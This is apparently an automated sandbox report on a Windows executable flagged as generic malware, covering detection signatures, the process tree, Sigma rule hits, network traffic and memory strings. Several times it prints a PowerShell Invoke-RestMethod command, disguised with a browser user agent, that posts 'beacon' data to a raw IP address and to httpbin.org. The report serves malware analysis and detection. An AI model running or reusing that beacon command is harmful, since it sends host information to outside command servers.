Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe
Analysis ID:	1528569
MD5:	ec294b697f39b8ec154b86e91be6957e
SHA1:	ae719714439fe37811aea360ed42a586bd6e3353
SHA256:	704dc6619a90ff82c8977bd4dd7167830d4de83bd7eb46b511105a9d33048a1f
Tags:	exe
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Machine Learning detection for sample

Potentially malicious time measurement code found

Suspicious powershell command line found

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe (PID: 7576 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe" MD5: EC294B697F39B8EC154B86E91BE6957E)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7644 cmdline: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8124 cmdline: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7264 cmdline: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6024 cmdline: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2212 cmdline: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7980 cmdline: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"" MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"", CommandLine: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, ParentProcessId: 7576, ParentProcessName: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, ProcessCommandLine: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"", ProcessId: 7644, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"", CommandLine: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, ParentProcessId: 7576, ParentProcessName: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, ProcessCommandLine: powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b|ConvertTo-Json) -headers $headers -ContentType \"application/json\"", ProcessId: 7644, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	ReversingLabs: Detection: 39%
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Virustotal: Detection: 58%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: softy.pdb9 source: powershell.exe, 00000002.00000002.1986403880.000001F1E9F35000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softy.pdb source: powershell.exe, 0000000A.00000002.2817614035.000001DCC0810000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb: source: powershell.exe, 00000002.00000002.1986403880.000001F1E9FFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: utomation.pdb2 source: powershell.exe, 00000007.00000002.2378199469.000001DC9D14C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2378199469.000001DC9D090000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2380075739.000001DC9D2E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1986403880.000001F1E9F5F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2819961114.000001DCC0A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.2380075739.000001DC9D2E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2817614035.000001DCC0893000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2819961114.000001DCC0A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb' source: powershell.exe, 00000002.00000002.1986403880.000001F1E9FFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbP source: powershell.exe, 00000007.00000002.2380075739.000001DC9D290000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ment.Automation.pdbh source: powershell.exe, 00000002.00000002.1987556693.000001F1EA1A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1987556693.000001F1EA130000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2819961114.000001DCC0A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1987556693.000001F1EA130000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.2378199469.000001DC9D090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1986403880.000001F1E9FFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1987556693.000001F1EA130000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2351549526.000001DC831B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2819961114.000001DCC0A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2380075739.000001DC9D290000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2819961114.000001DCC0A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1986403880.000001F1E9F89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2817614035.000001DCC085D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb*X' source: powershell.exe, 0000000A.00000002.2817614035.000001DCC08CD000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Code function: 4x nop then mov rdi, 0000800000000000h

0_2_00A88800

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: global traffic	HTTP traffic detected: POST /post HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Content-Type: application/jsonHost: 44.207.250.251Content-Length: 190Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /post HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Content-Type: application/jsonHost: httpbin.orgContent-Length: 190Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /post HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Content-Type: application/jsonHost: 44.207.250.251Content-Length: 190Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /post HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Content-Type: application/jsonHost: httpbin.orgContent-Length: 190Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /post HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Content-Type: application/jsonHost: 44.207.250.251Content-Length: 190Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /post HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Content-Type: application/jsonHost: httpbin.orgContent-Length: 190Expect: 100-continueConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	TCP traffic detected without corresponding DNS query: 44.207.250.251
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: httpbin.org

Source: unknown

HTTP traffic detected: POST /post HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Content-Type: application/jsonHost: 44.207.250.251Content-Length: 190Expect: 100-continueConnection: Keep-Alive

Source: powershell.exe, 00000002.00000002.1969487291.000001F180C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC856C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA9147000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://44.207.250.251
Source: powershell.exe, 0000000A.00000002.2774951356.000001DCA878A000.00000004.00000800.00020000.00000000.sdmp, Null.10.dr, Null.2.dr, Null.7.dr	String found in binary or memory: http://44.207.250.251/post
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C0000A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://44.207.250.251/post34282f2a34282f2b356a75696e
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C0000A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://44.207.250.251/post34282f2a34282f2b356a75696e.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C00009E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://44.207.250.251/postPATHEXTC:
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://44.207.250.251/postPATHEXTPATHEXT=::=::
Source: powershell.exe, 00000008.00000002.2440115787.000002009D7BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000006.00000002.2007257805.000001F422AC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.0000020085E43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.00000208491DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.o
Source: powershell.exe, 00000006.00000002.2007257805.000001F422A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F422AAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.0000020085DD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.0000020085E2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.00000208491C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.000002084917C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org
Source: powershell.exe, 0000000B.00000002.2844916285.000002084888E000.00000004.00000800.00020000.00000000.sdmp, Null.6.dr, Null.8.dr, Null.11.dr	String found in binary or memory: http://httpbin.org/post
Source: powershell.exe, 00000006.00000002.2007257805.000001F422AC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.0000020085E43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.00000208491DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/post8
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000088000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/post873743475687d356a75696e
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000010000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000088000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/post873743475687d356a75696eC:
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000088000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/post873743475687d356a75696ehttp://httpbin.org/postpowershell.exe.compowershell.ex
Source: powershell.exe, 0000000B.00000002.2844916285.00000208491DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/postmplant
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000088000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/postpowershell.exe.compowershell.exe.exepowershell.exe.batpowershell.exe.cmd
Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe, 00000000.00000002.2990264274.000000C000016000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/postpowershell.exe.compowershell.exe.exepowershell.exe.batpowershell.exe.cmdpower
Source: powershell.exe, 00000002.00000002.1969487291.000001F18199D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1981769027.000001F190075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1969487291.000001F180232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1969487291.000001F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F42203D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC84F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.00000200853B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA880D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.00000208487C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1987556693.000001F1EA130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICE
Source: powershell.exe, 00000002.00000002.1969487291.000001F180232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.2404481028.0000020083525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.1969487291.000001F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F42206C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F42207F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC84F4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC84F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.00000200853FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.00000200853EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA875D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA8749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.000002084879D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.0000020848763000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1969487291.000001F180232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1969487291.000001F180232000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterp
Source: powershell.exe, 00000002.00000002.1969487291.000001F180C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2007257805.000001F4225FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2352922675.000001DC85428000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2407664513.00000200858C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2774951356.000001DCA8C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2844916285.0000020848D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1969487291.000001F18199D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1981769027.000001F190075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1981769027.000001F1901B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A88C80	0_2_00A88C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A85CE0	0_2_00A85CE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A660C0	0_2_00A660C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A6C020	0_2_00A6C020
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A74020	0_2_00A74020
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A85020	0_2_00A85020
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A88800	0_2_00A88800
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A7BDA0	0_2_00A7BDA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A7E980	0_2_00A7E980
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Code function: 0_2_00A95D20	0_2_00A95D20
